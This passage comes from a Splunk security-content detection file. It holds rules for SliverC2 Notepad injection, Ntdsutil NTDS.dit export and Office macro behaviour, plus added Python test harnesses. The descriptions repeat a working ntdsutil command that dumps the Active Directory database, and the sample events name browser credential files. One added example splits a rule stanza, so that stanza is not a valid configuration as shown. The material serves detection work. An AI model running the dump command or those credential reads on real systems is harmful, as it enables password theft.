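            counts[key] = counts.get(key, 0) + 1
    return counts


SAMPLE_EVENTS = [  # constructed for this example
    # unknown binary reading Chrome's saved-credential store: flagged
    {"EventCode": 4663, "process_name": r"C:\Users\bob\AppData\Local\Temp\update.exe",
     "Object_Name": r"C:\Users\bob\AppData\Local\Google\Chrome\User Data\Default\Login Data"},
    # Chrome itself: allow-listed
    {"EventCode": 4663, "process_name": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "Object_Name": r"C:\Users\bob\AppData\Local\Google\Chrome\User Data\Default\Cookies"},
    # unknown binary reading Firefox cookies: flagged
    {"EventCode": 4663, "process_name": r"C:\Users\bob\Downloads\reader.exe",
     "Object_Name": r"C:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\ab12.default\cookies.sqlite"},
    # caveat: '*sql*' exempts anything with 'sql' in its path, including this one
    {"EventCode": 4663, "process_name": r"C:\Users\bob\Downloads\notsql.exe",
     "Object_Name": r"C:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\ab12.default\key4.db"},
    # explorer.exe browsing the folder: allow-listed
    {"EventCode": 4663, "process_name": r"C:\Windows\explorer.exe",
     "Object_Name": r"C:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\ab12.default"},
]

if __name__ == "__main__":
    for key, n in summarize(SAMPLE_EVENTS).items():
        print(n, key)
```

Running it stand-alone prints the two flagged rows (update.exe against Login Data, reader.exe against cookies.sqlite) and silently drops notsql.exe; replacing `*sql*` with the full path of the SQLite browser actually deployed removes that gap without adding noise.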
action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 35}, {"risk_object_field": "parent_process_name", "risk_object_type": "other", "risk_score": 35}, {"risk_object_field": "process_name", "risk_object_type": "other", "risk_score": 35}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Notepad with no Command Line Arguments - Rule
action.correlationsearch.annotations = {"analytic_story": ["BishopFox Sliver Adversary Emulation Framework"], "cis20": ["CIS 10"], "confidence": 70, "impact": 50, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1055"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = The following analytic identifies behavior related to the default SliverC2 framework, where it will inject into Notepad.exe and spawn Notepad.exe with no command line arguments. In testing, this is a common procedure for SliverC2 usage; however, it may be modified or changed. From Microsoft, "The Sideload, SpawnDll, and Execute-Assembly commands spawn and inject into notepad.exe by default. The following query finds process creation events where the same process creates and injects into notepad.exe within 10 seconds."
action.notable.param.rule_title = Notepad with no Command Line Arguments
action.notable.param.security_domain = endpoint
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime FROM datamodel=Endpoint.Processes where Processes.process_name=notepad.exe AND Processes.action!="blocked" by host _time span=1h Processes.process_id Processes.process_name Processes.dest Processes.process_path Processes.process Processes.parent_process_name Processes.parent_process | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | regex process="(?i)(notepad\.exe.{0,4}$)" | `notepad_with_no_command_line_arguments_filter`

[ESCU - Ntdsutil Export NTDS - Rule]
action.escu = 0
action.escu.enabled = 1
description = Monitor for signs that Ntdsutil is being used to Extract Active Directory database - NTDS.dit, typically used for offline password cracking. It may be used in normal circumstances with no command line arguments or shorthand variations of more common arguments. Ntdsutil.exe is typically seen run on a Windows Server. Typical command used to dump ntds.dit \ ntdsutil "ac i ntds" "ifm" "create full C:\Temp" q q \ This technique uses "Install from Media" (IFM), which will extract a copy of the Active Directory database. A successful export of the Active Directory database will yield a file modification named ntds.dit to the destination.
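An added example, not from Splunk: the `regex process="(?i)(notepad\.exe.{0,4}$)"` tail filter and the `Processes.action!="blocked"` condition of the Notepad search above, applied in Python to constructed Endpoint.Processes rows. It shows that the four-character slack tolerates a closing quote or trailing space around the image path, as EDRs commonly record it, and also lets a very short argument such as `/p` through, which is worth knowing when tuning the filter macro.

```python
"""Added example (not Splunk's own code): apply the tail filter of the
'Notepad with no Command Line Arguments' search, regex (?i)(notepad\.exe.{0,4}$)
plus action != "blocked", to sample Endpoint.Processes rows. Rows are constructed."""
import re

# Same expression the search passes to the regex command.
NO_ARGS_RE = re.compile(r"(?i)(notepad\.exe.{0,4}$)")


def is_notepad_without_args(row):
    """True when notepad.exe ran with at most 4 characters after its image name."""
    if row.get("process_name", "").lower() != "notepad.exe":
        return False
    if row.get("action") == "blocked":
        return False
    return NO_ARGS_RE.search(row.get("process", "")) is not None


def flag_rows(rows):
    """(parent_process_name, process) pairs the detection would surface, in order."""
    return [(r["parent_process_name"], r["process"]) for r in rows if is_notepad_without_args(r)]


SAMPLE_ROWS = [  # constructed for this example
    {"process_name": "notepad.exe", "parent_process_name": "svchost.exe",
     "process": r'"C:\Windows\System32\notepad.exe"', "action": "allowed"},   # quoted path, no args
    {"process_name": "notepad.exe", "parent_process_name": "rundll32.exe",
     "process": r"C:\Windows\System32\notepad.exe ", "action": "allowed"},    # trailing space
    {"process_name": "notepad.exe", "parent_process_name": "explorer.exe",
     "process": r'"C:\Windows\System32\notepad.exe" C:\Users\bob\notes.txt', "action": "allowed"},
    {"process_name": "notepad.exe", "parent_process_name": "svchost.exe",
     "process": r'"C:\Windows\System32\notepad.exe"', "action": "blocked"},   # excluded by action
    {"process_name": "NOTEPAD.EXE", "parent_process_name": "cmd.exe",
     "process": r"notepad.exe /p", "action": "allowed"},                       # 3 trailing chars
]

if __name__ == "__main__":
    for parent, cmd in flag_rows(SAMPLE_ROWS):
        print(f"{parent} -> {cmd!r}")
```

The first, second and last rows are returned; the last one demonstrates that `.{0,4}$` is a tolerance for quoting, not a strict "no arguments" test, so a parent-process allow list in `notepad_with_no_command_line_arguments_filter` does the real tuning.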
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1003.003", "T1003"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = Monitor for signs that Ntdsutil is being used to Extract Active Directory database - NTDS.dit, typically used for offline password cracking. It may be used in normal circumstances with no command line arguments or shorthand variations of more common arguments. Ntdsutil.exe is typically seen run on a Windows Server. Typical command used to dump ntds.dit \ ntdsutil "ac i ntds" "ifm" "create full C:\Temp" q q \ This technique uses "Install from Media" (IFM), which will extract a copy of the Active Directory database. A successful export of the Active Directory database will yield a file modification named ntds.dit to the destination. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Highly possible Server Administrators will troubleshoot with ntdsutil.exe, generating false positives. 
action.escu.creation_date = 2021-01-28
action.escu.modification_date = 2021-01-28
action.escu.confidence = high
action.escu.full_search_name = ESCU - Ntdsutil Export NTDS - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"]
action.escu.analytic_story = ["Credential Dumping", "HAFNIUM Group", "Living Off The Land", "Prestige Ransomware", "Volt Typhoon", "Rhysida Ransomware"]
action.risk = 1
action.risk.param._risk_message = Active Directory NTDS export on $dest$
action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 50}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Ntdsutil Export NTDS - Rule
action.correlationsearch.annotations = {"analytic_story": ["Credential Dumping", "HAFNIUM Group", "Living Off The Land", "Prestige Ransomware", "Volt Typhoon", "Rhysida Ransomware"], "cis20": ["CIS 10"], "confidence": 50, "impact": 100, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1003.003", "T1003"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = Monitor for signs that Ntdsutil is being used to Extract Active Directory database - NTDS.dit, typically used for offline password cracking. It may be used in normal circumstances with no command line arguments or shorthand variations of more common arguments. Ntdsutil.exe is typically seen run on a Windows Server. Typical command used to dump ntds.dit \ ntdsutil "ac i ntds" "ifm" "create full C:\Temp" q q \ This technique uses "Install from Media" (IFM), which will extract a copy of the Active Directory database. A successful export of the Active Directory database will yield a file modification named ntds.dit to the destination.
action.notable.param.rule_title = Ntdsutil Export NTDS
action.notable.param.security_domain = endpoint
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where (Processes.process_name=ntdsutil.exe Processes.process=*ntds* Processes.process=*create*) by Processes.dest Processes.user Processes.parent_process Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)`| `security_content_ctime(lastTime)` | `ntdsutil_export_ntds_filter`

[ESCU - Office Application Drop Executable - Rule]
action.escu = 0
action.escu.enabled = 1
description = This search is to detect a suspicious MS office application that drops or creates executables or scripts in a Windows Operating System. This behavior is commonly seen in spear phishing office attachments where it drops malicious files or scripts to compromise the host. Some normal macros may drop scripts or tools as part of automation, but this behavior is still really suspicious and not commonly seen in normal office applications.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Delivery"], "mitre_attack": ["T1566", "T1566.001"], "nist": ["DE.CM"]}
action.escu.data_models = ["Endpoint"]
action.escu.eli5 = This search is to detect a suspicious MS office application that drops or creates executables or scripts in a Windows Operating System. This behavior is commonly seen in spear phishing office attachments where it drops malicious files or scripts to compromise the host. Some normal macros may drop scripts or tools as part of automation, but this behavior is still really suspicious and not commonly seen in normal office applications.
action.escu.how_to_implement = To successfully implement this search, you need to be ingesting logs with the process name, parent process, and command-line executions from your endpoints. If you are using Sysmon, you must have at least version 6.0.4 of the Sysmon TA. Tune and filter known instances where renamed rundll32.exe may be used.
action.escu.known_false_positives = Office macros used for automation may exhibit this behavior.
action.escu.creation_date = 2023-02-15
action.escu.modification_date = 2023-02-15
action.escu.confidence = high
action.escu.full_search_name = ESCU - Office Application Drop Executable - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"]
action.escu.analytic_story = ["FIN7", "AgentTesla", "CVE-2023-21716 Word RTF Heap Corruption", "Warzone RAT", "PlugX"]
action.risk = 1
action.risk.param._risk_message = process $process_name$ drops a file $file_name$ in host $dest$
action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 64}, {"threat_object_field": "process_name", "threat_object_type": "process"}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Office Application Drop Executable - Rule
action.correlationsearch.annotations = {"analytic_story": ["FIN7", "AgentTesla", "CVE-2023-21716 Word RTF Heap Corruption", "Warzone RAT", "PlugX"], "cis20": ["CIS 10"], "confidence": 80, "impact": 80, "kill_chain_phases": ["Delivery"], "mitre_attack": ["T1566", "T1566.001"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = This search is to detect a suspicious MS office application that drops or creates executables or scripts in a Windows Operating System. This behavior is commonly seen in spear phishing office attachments where it drops malicious files or scripts to compromise the host. Some normal macros may drop scripts or tools as part of automation, but this behavior is still really suspicious and not commonly seen in normal office applications.
action.notable.param.rule_title = Office Application Drop Executable
action.notable.param.security_domain = endpoint
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Processes where Processes.process_name IN ("winword.exe","excel.exe","powerpnt.exe","mspub.exe","visio.exe","wordpad.exe","wordview.exe","onenote.exe","onenotem.exe","onenoteviewer.exe","onenoteim.exe","msaccess.exe") by _time span=1h Processes.process_id Processes.process_name Processes.process Processes.dest Processes.process_guid | `drop_dm_object_name(Processes)` |join process_guid, _time [| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime FROM datamodel=Endpoint.Filesystem where Filesystem.file_name IN ("*.exe","*.dll","*.pif","*.scr","*.js","*.vbs","*.vbe","*.ps1") by _time span=1h Filesystem.dest Filesystem.file_create_time Filesystem.file_name Filesystem.process_guid Filesystem.file_path | `drop_dm_object_name(Filesystem)` | fields _time dest file_create_time file_name file_path process_name process_path process process_guid] | dedup file_create_time | table dest, process_name, process, file_create_time, file_name, file_path, process_guid | `office_application_drop_executable_filter`

[ESCU - Office Application Spawn Regsvr32 process - Rule]
action.escu = 0
action.escu.enabled = 1
description = This detection was designed to identify suspicious spawned processes of known MS office applications due to macro or malicious code. This technique can be seen in so many malware like IcedID that used MS office as its weapon or attack vector to initially infect the machines.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Delivery"], "mitre_attack": ["T1566", "T1566.001"], "nist": ["DE.CM"]}
action.escu.data_models = ["Endpoint"]
action.escu.eli5 = This detection was designed to identify suspicious spawned processes of known MS office applications due to macro or malicious code. This technique can be seen in so many malware like IcedID that used MS office as its weapon or attack vector to initially infect the machines.
action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process.
action.escu.known_false_positives = unknown
action.escu.creation_date = 2023-02-15
action.escu.modification_date = 2023-02-15
action.escu.confidence = high
action.escu.full_search_name = ESCU - Office Application Spawn Regsvr32 process - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"]
action.escu.analytic_story = ["IcedID", "Qakbot"]
action.risk = 1
action.risk.param._risk_message = Office application spawning regsvr32.exe on $dest$
action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 63}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Office Application Spawn Regsvr32 process - Rule
action.correlationsearch.annotations = {"analytic_story": ["IcedID", "Qakbot"], "cis20": ["CIS 10"], "confidence": 90, "impact": 70, "kill_chain_phases": ["Delivery"], "mitre_attack": ["T1566", "T1566.001"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = This detection was designed to identify suspicious spawned processes of known MS office applications due to macro or malicious code. This technique can be seen in so many malware like IcedID that used MS office as its weapon or attack vector to initially infect the machines.
action.notable.param.rule_title = Office Application Spawn Regsvr32 process
action.notable.param.security_domain = endpoint
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where (Processes.parent_process_name = "winword.exe" OR Processes.parent_process_name = "excel.exe" OR Processes.parent_process_name = "powerpnt.exe" OR Processes.parent_process_name = "outlook.exe" OR Processes.parent_process_name = "onenote.exe" OR Processes.parent_process_name = "onenotem.exe" OR Processes.parent_process_name = "onenoteviewer.exe" OR Processes.parent_process_name = "onenoteim.exe" OR Processes.parent_process_name="msaccess.exe") `process_regsvr32` by Processes.parent_process_name Processes.parent_process Processes.process_name Processes.original_file_name Processes.process Processes.process_id Processes.process_guid Processes.user Processes.dest | `drop_dm_object_name("Processes")` | `security_content_ctime(firstTime)` |`security_content_ctime(lastTime)` | `office_application_spawn_regsvr32_process_filter`

[ESCU - Office Application Spawn rundll32 process - Rule]
action.escu = 0
action.escu.enabled = 1
description = This detection was designed to identify suspicious spawned processes of known MS office applications due to macro or malicious code. This technique can be seen in so many malware like trickbot that used MS office as its weapon or attack vector to initially infect the machines.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Delivery"], "mitre_attack": ["T1566", "T1566.001"], "nist": ["DE.CM"]}
action.escu.data_models = ["Endpoint"]
action.escu.eli5 = This detection was designed to identify suspicious spawned processes of known MS office applications due to macro or malicious code. This technique can be seen in so many malware like trickbot that used MS office as its weapon or attack vector to initially infect the machines.
action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process.
action.escu.known_false_positives = unknown
action.escu.creation_date = 2023-02-15
action.escu.modification_date = 2023-02-15
action.escu.confidence = high
action.escu.full_search_name = ESCU - Office Application Spawn rundll32 process - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"]
action.escu.analytic_story = ["Spearphishing Attachments", "Trickbot", "IcedID", "AgentTesla", "NjRAT"]
action.risk = 1
action.risk.param._risk_message = Office application spawning rundll32.exe on $dest$
action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 63}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Office Application Spawn rundll32 process - Rule
action.correlationsearch.annotations = {"analytic_story": ["Spearphishing Attachments", "Trickbot", "IcedID", "AgentTesla", "NjRAT"], "cis20": ["CIS 10"], "confidence": 90, "impact": 70, "kill_chain_phases": ["Delivery"], "mitre_attack": ["T1566", "T1566.001"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = This detection was designed to identify suspicious spawned processes of known MS office applications due to macro or malicious code. This technique can be seen in so many malware like trickbot that used MS office as its weapon or attack vector to initially infect the machines.
action.notable.param.rule_title = Office Application Spawn rundll32 process
action.notable.param.security_domain = endpoint
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where (Processes.parent_process_name = "winword.exe" OR Processes.parent_process_name = "excel.exe" OR Processes.parent_process_name = "powerpnt.exe" OR Processes.parent_process_name= "onenote.exe" OR Processes.parent_process_name = "onenotem.exe" OR Processes.parent_process_name = "onenoteviewer.exe" OR Processes.parent_process_name = "onenoteim.exe" OR Processes.parent_process_name = "msaccess.exe") AND `process_rundll32` by Processes.parent_process Processes.process_name Processes.process_id Processes.process_guid Processes.process Processes.user Processes.dest | `drop_dm_object_name("Processes")` | `security_content_ctime(firstTime)` |`security_content_ctime(lastTime)` | `office_application_spawn_rundll32_process_filter`

[ESCU - Office Document Creating Schedule Task - Rule]
action.escu = 0
action.escu.enabled = 1
description = This search detects a potentially malicious office document that creates a scheduled task entry through the macro VBA API or by loading taskschd.dll. This technique was seen in many malicious macro malware that create persistence or beaconing using a scheduled task entry. The search will return the first time and last time the task was registered, as well as the `Command` to be executed, `Task Name`, `Author`, `Enabled`, and whether it is `Hidden` or not. schtasks.exe is natively found in `C:\Windows\system32` and `C:\Windows\syswow64`. The following DLL(s) are loaded when schtasks.exe or TaskService is launched -`taskschd.dll`. If found loaded by another process, it's possible a scheduled task is being registered within that process context in memory. Upon triage, identify the task scheduled source. Was it schtasks.exe or via TaskService? Review the job created and the Command to be executed. Capture any artifacts on disk and review. Identify any parallel processes within the same timeframe to identify source.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Delivery"], "mitre_attack": ["T1566", "T1566.001"], "nist": ["DE.CM"]}
action.escu.data_models = []
action.escu.eli5 = This search detects a potentially malicious office document that creates a scheduled task entry through the macro VBA API or by loading taskschd.dll. This technique was seen in many malicious macro malware that create persistence or beaconing using a scheduled task entry. The search will return the first time and last time the task was registered, as well as the `Command` to be executed, `Task Name`, `Author`, `Enabled`, and whether it is `Hidden` or not. schtasks.exe is natively found in `C:\Windows\system32` and `C:\Windows\syswow64`. The following DLL(s) are loaded when schtasks.exe or TaskService is launched -`taskschd.dll`. If found loaded by another process, it's possible a scheduled task is being registered within that process context in memory. Upon triage, identify the task scheduled source. Was it schtasks.exe or via TaskService? Review the job created and the Command to be executed. Capture any artifacts on disk and review. Identify any parallel processes within the same timeframe to identify source.
action.escu.how_to_implement = To successfully implement this search, you need to be ingesting logs with the process name and ImageLoaded (like Sysmon EventCode 7) from your endpoints. If you are using Sysmon, you must have at least version 6.0.4 of the Sysmon TA. Also be sure to include the monitored DLLs in your own Sysmon config.
action.escu.known_false_positives = unknown
action.escu.creation_date = 2023-02-15
action.escu.modification_date = 2023-02-15
action.escu.confidence = high
action.escu.full_search_name = ESCU - Office Document Creating Schedule Task - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Microsoft Sysmon"]
action.escu.analytic_story = ["Spearphishing Attachments"]
action.risk = 1
action.risk.param._risk_message = Office document creating a schedule task on $dest$
action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 49}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Office Document Creating Schedule Task - Rule
action.correlationsearch.annotations = {"analytic_story": ["Spearphishing Attachments"], "cis20": ["CIS 10"], "confidence": 70, "impact": 70, "kill_chain_phases": ["Delivery"], "mitre_attack": ["T1566", "T1566.001"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = This search detects a potentially malicious office document that creates a scheduled task entry through the macro VBA API or by loading taskschd.dll. This technique was seen in many malicious macro malware that create persistence or beaconing using a scheduled task entry. The search will return the first time and last time the task was registered, as well as the `Command` to be executed, `Task Name`, `Author`, `Enabled`, and whether it is `Hidden` or not. schtasks.exe is natively found in `C:\Windows\system32` and `C:\Windows\syswow64`. The following DLL(s) are loaded when schtasks.exe or TaskService is launched -`taskschd.dll`. If found loaded by another process, it's possible a scheduled task is being registered within that process context in memory. Upon triage, identify the task scheduled source. Was it schtasks.exe or via TaskService? Review the job created and the Command to be executed. Capture any artifacts on disk and review. Identify any parallel processes within the same timeframe to identify source.
action.notable.param.rule_title = Office Document Creating Schedule Task
action.notable.param.security_domain = endpoint
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `sysmon` EventCode=7 parent_process_name IN ("WINWORD.EXE", "EXCEL.EXE", "POWERPNT.EXE","onenote.exe","onenotem.exe","onenoteviewer.exe","onenoteim.exe", "msaccess.exe") ImageLoaded = "*\\taskschd.dll" | stats min(_time) as firstTime max(_time) as lastTime values(ImageLoaded) as AllImageLoaded count by Computer EventCode Image parent_process_name ProcessId ProcessGuid | rename Computer as dest | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `office_document_creating_schedule_task_filter`

[ESCU - Office Document Executing Macro Code - Rule]
action.escu = 0
action.escu.enabled = 1
description = This detection was designed to identify suspicious office documents that use macro code. Macro code is known to be one of the prevalent weaponization or attack vectors of threat actors. This malicious macro code is embedded in an office document sent as an attachment, which may execute a malicious payload, download a malware payload or other malware components. It is really good practice to disable macros by default to avoid automatically executing macro code while opening or closing office document files.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Delivery"], "mitre_attack": ["T1566", "T1566.001"], "nist": ["DE.CM"]}
action.escu.data_models = []
action.escu.eli5 = This detection was designed to identify suspicious office documents that use macro code. Macro code is known to be one of the prevalent weaponization or attack vectors of threat actors. This malicious macro code is embedded in an office document sent as an attachment, which may execute a malicious payload, download a malware payload or other malware components. It is really good practice to disable macros by default to avoid automatically executing macro code while opening or closing office document files.
action.escu.how_to_implement = To successfully implement this search, you need to be ingesting logs with the process name and ImageLoaded (like Sysmon EventCode 7) from your endpoints. If you are using Sysmon, you must have at least version 6.0.4 of the Sysmon TA. Also be sure to include the monitored DLLs in your own Sysmon config.
action.escu.known_false_positives = Normal Office Document macro use for automation
action.escu.creation_date = 2023-01-24
action.escu.modification_date = 2023-01-24
action.escu.confidence = high
action.escu.full_search_name = ESCU - Office Document Executing Macro Code - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Microsoft Sysmon"]
action.escu.analytic_story = ["Spearphishing Attachments", "Trickbot", "IcedID", "DarkCrystal RAT", "AgentTesla", "Qakbot", "Azorult", "Remcos", "PlugX", "NjRAT"]
action.risk = 1
action.risk.param._risk_message = Office document executing a macro on $dest$
action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 35}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Office Document Executing Macro Code - Rule
action.correlationsearch.annotations = {"analytic_story": ["Spearphishing Attachments", "Trickbot", "IcedID", "DarkCrystal RAT", "AgentTesla", "Qakbot", "Azorult", "Remcos", "PlugX", "NjRAT"], "cis20": ["CIS 10"], "confidence": 50, "impact": 70, "kill_chain_phases": ["Delivery"], "mitre_attack": ["T1566", "T1566.001"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = This detection was designed to identify suspicious office documents that use macro code. Macro code is known to be one of the prevalent weaponization or attack vectors of threat actors. This malicious macro code is embedded in an office document sent as an attachment, which may execute a malicious payload, download a malware payload or other malware components. It is really good practice to disable macros by default to avoid automatically executing macro code while opening or closing office document files.
action.notable.param.rule_title = Office Document Executing Macro Code
action.notable.param.security_domain = endpoint
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `sysmon` EventCode=7 parent_process_name IN ("WINWORD.EXE", "EXCEL.EXE", "POWERPNT.EXE","onenote.exe","onenotem.exe","onenoteviewer.exe","onenoteim.exe","msaccess.exe") ImageLoaded IN ("*\\VBE7INTL.DLL","*\\VBE7.DLL", "*\\VBEUI.DLL") | stats min(_time) as firstTime max(_time) as lastTime values(ImageLoaded) as AllImageLoaded count by Computer EventCode Image process_name ProcessId ProcessGuid | rename Computer as dest| `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `office_document_executing_macro_code_filter`

[ESCU - Office Document Spawned Child Process To Download - Rule]
action.escu = 0
action.escu.enabled = 1
description = This search is to detect a potentially malicious office document executing a lolbin child process to download a payload or other malware. Most attackers abuse the capability of office documents to execute living-off-the-land applications to blend into the normal noise on the infected machine and cover their tracks.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Delivery"], "mitre_attack": ["T1566", "T1566.001"], "nist": ["DE.CM"]}
action.escu.data_models = ["Endpoint"]
action.escu.eli5 = This search is to detect a potentially malicious office document executing a lolbin child process to download a payload or other malware. Most attackers abuse the capability of office documents to execute living-off-the-land applications to blend into the normal noise on the infected machine and cover their tracks.
